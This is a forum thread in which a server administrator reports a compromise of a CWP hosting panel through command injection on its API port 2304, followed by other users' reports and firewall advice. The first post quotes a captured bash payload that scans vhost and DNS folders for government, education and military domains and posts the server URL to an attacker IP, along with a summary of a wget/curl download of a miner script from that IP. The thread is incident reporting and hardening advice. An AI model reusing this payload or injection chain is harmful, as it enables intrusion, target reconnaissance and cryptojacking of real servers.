Author Topic: My server was hacked through open port 2304. Block IP 146.103.45.130  (Read 135 times)

Martins-phpbb and 1 Guest are viewing this topic.

Offline
*
Hi,
The server was hacked and a miner was launched.
Distro Name: AlmaLinux release 9.8
CWPpro version: 1.17

Also, based on log analysis, the gpt chat created a visualization of the attack.
Internet > 146.103.45.130 > CWP API :2304 > POST /v1/backup > command injection > bash -c > wget/curl [http://]146.103.45.130/ omrig.sh > XMRig 6.26.0 (polkitd-helpers, dbus-monitor-srv, systemd-logind-helpers) > 146.103.45.130:3333 > Monero mining

I immediately closed the port and deleted all the services he created. It seemed like there was nothing left in the system, but the miner sent data to the hacker's server for an hour.

I hope the developers will fix the issue with port 2304. The omrig.sh script is still available for download on this server. Please run everything in a sandbox and make the panel more secure!!!!!!!!
Code: [Select]
Start backup ;T_URL=https://my.server:2304/ bash -c #!/bin/bash T_URL=${T_URL:-"none"} URL="http://146.103.45.130:8891/dataawpdlapwdlpawdlkaowdkoawkok213ok213o" PAYLOAD='{"status": "special"}' DIRS=( "/usr/local/apache/conf.d/vhosts" "/etc/nginx/conf.d/vhosts", "/var/named/" ) PATTERNS=( "*.go.*" "*.ac.*" "*.gov" "*.gov.*" "*.edu" "*.edu.*" "*.gob.*" "*.gob" "*.mil" "*.mil.*" ) FIND_ARGS=() for i in "${!PATTERNS[@]}"; do if [ "$i" -gt 0 ]; then FIND_ARGS+=(-o) fi FIND_ARGS+=(-name "${PATTERNS[$i]}") done FOUND=0 for dir in "${DIRS[@]}"; do if [ ! -d "$dir" ]; then continue fi if find "$dir" -maxdepth 1 \( "${FIND_ARGS[@]}" \) -print -quit | grep -q .; then FOUND=1 fi done if [ "$FOUND" -eq 1 ]; then if command -v curl &> /dev/null; then # -s: silent, -o /dev/null: ignore body, -w "%{http_code}": print status code STATUS=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$URL" \ -H "Content-Type: application/json" \ -H "X-URL: $T_URL" \ -d "$PAYLOAD") # Check if HTTP status is in the 2xx success range (200-299) if [ "$STATUS" -ge 200 ] && [ "$STATUS" -lt 300 ]; then echo "ok (curl: $STATUS)" exit 0 fi fi if command -v wget &> /dev/null; then # --post-data ensures compatibility across all wget versions if wget -q -O /dev/null --header="Content-Type: application/json" --header="X-URL: $T_URL" --post-data="$PAYLOAD" "$URL"; then echo "ok (wget)" exit 0 fi fi echo "special_yes" else echo "special_no" fi;20260725115706053575a77f0cce7e3491ed9e2c1fed47
It's too bad that I can't publish the full log on the forum.
« Last Edit: October 05, 2026, 03:40:12 AM by alexander999 »

Offline
*
Re: My server was hacked through open port 2304. Block IP 146.103.45.130
« Reply #1 on: October 05, 2026, 09:52:42 AM »
Dozens of our servers with the same configuration have been hacked in the same way.

Our servers running CWP haven't been secure for months; anyone can gain root access at will and do whatever they want on them.

We are completely exhausted from constantly dealing with CWP servers getting hacked 24/7. We are losing all our customers because of this.

I no longer believe the CWP team possesses the level of expertise required to handle this panel.

Offline
****
Guys,

If you’re not already using CSF, install one of these forks:
https://github.com/Aetherinox/csf-firewall
https://github.com/Black-HOST/csf
and then close port 2304 for everyone. To do this, remove 2304 from TCP_IN in /etc/csf/csf.conf.

If your infrastructure requires access to the CWP API, allow access to port 2304 only from specific host(s). Add the following rule to /etc/csf/csf.allow:
Code: [Select]
tcp|in|d=2304|s=XXX.XXX.XXX.XXX
where XXX.XXX.XXX.XXX is the IP address of the allowed host.

Offline
*
Hi,
Everyone uses a firewall, yes, I didn't specify  IP address of another server, but the panel itself is leaky, anyone can execute code (even without an API key) and this is a huge problem.